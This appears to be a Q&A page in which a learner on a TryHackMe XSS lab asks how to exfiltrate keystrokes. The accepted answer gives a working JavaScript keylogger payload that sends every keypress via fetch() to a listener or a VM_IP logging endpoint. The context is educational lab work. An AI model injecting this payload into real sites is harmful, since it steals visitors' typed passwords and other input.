TechQA.

Send Javascript data to SimpleHTTPServer

436 views Asked by At

I'm doing the xss challenge on tryhackme.com (https://tryhackme.com/room/xss). The 7th task asks me to use a simple keylogger

 <script type="text/javascript">
 let l = "";
 document.onkeypress = function (e) {
   l += e.key;
   console.log(l);
 }
</script>

and send the input to http://<vm ip>/log/<this data will be logged> as that will log the keystrokes which can be viewed by going to http://<vm ip>/logs. I have tried things such as window.location, but can't get it to work.

For further learning, I'd also like to send the data to my SimpleHTTPServer running on port 8000, so that the keys would be displayed in my terminal as they are typed on the webpage. I cannot get this to work.

Could someone please show me how to do this?

No, I am not being malicious. I am learning as I'd like to work in cyber security. If I was being malicious I'd just use scripts I'd find on GitHub or something without understanding how they work.

Thank you.

javascript xss simplehttpserver
Original Q&A
2

There are 2 answers

0
Joel On BEST ANSWER

As SimpleHTTPServer logs every request it receives, you can use fetch() to make a GET request and pass the data within it.

<script type="text/javascript">
    let l = "";
    document.onkeypress = function (e) {
      l += e.key;
      console.log(l);

       fetch(`http://127.0.0.1:8000?logger=${l}`, { mode: 'no-cors'});
    }
</script>

This would give you something like this: enter image description here

For sending the data to the VM you could use fetch too, being it something like this:

fetch(`http://VM_IP/log/${l}`, { mode: 'no-cors'});
0
Ian On

Excluding many packaging resources, you can use a simple WEB API to achieve this purpose. Here I briefly introduce two WEB APIs

Fetch API

The Fetch API provides a JavaScript interface for accessing and manipulating parts of the HTTP pipeline, such as requests and responses.

fetch('http://example.com/movies.json')
  .then(function(response) {
    return response.json();
  })
  .then(function(myJson) {
    console.log(myJson);
  });

XMLHttpRequest API

XMLHttpRequest (XHR) objects are used to interact with servers. You can retrieve data from a URL without having to do a full page refresh. This enables a Web page to update just part of a page without disrupting what the user is doing.

function reqListener () {
  console.log(this.responseText);
}
var oReq = new XMLHttpRequest();
oReq.addEventListener("load", reqListener);
oReq.open("GET", "http://www.example.org/example.txt");
oReq.send();

Related Questions in JAVASCRIPT

Related Questions in XSS

Related Questions in SIMPLEHTTPSERVER

Popular Questions

Trending Questions